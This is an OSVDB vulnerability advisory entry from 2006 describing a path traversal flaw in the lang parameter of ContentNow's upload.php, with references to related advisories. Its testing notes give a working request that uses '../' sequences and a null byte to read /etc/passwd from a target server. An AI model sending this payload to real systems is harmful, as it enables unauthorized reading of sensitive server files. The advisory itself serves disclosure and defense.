ContentNow cn/upload.php lang Variable Traversal Arbitrary File Access

2006-11-13T09:03:59
ID OSVDB:30323
Type osvdb
Reporter OSVDB
Modified 2006-11-13T09:03:59

Description

Manual Testing Notes

http://[target]/cn/upload.php?lang=../../../../etc/passwd%00

References:

Vendor URL: http://www.contentnow.mf4k.de/ Secunia Advisory ID:22805 Related OSVDB ID: 30321 Related OSVDB ID: 30324 Related OSVDB ID: 30322 Related OSVDB ID: 30325 Mail List Post: http://whitestar.linuxbox.org/pipermail/exploits/2006-November/000008.html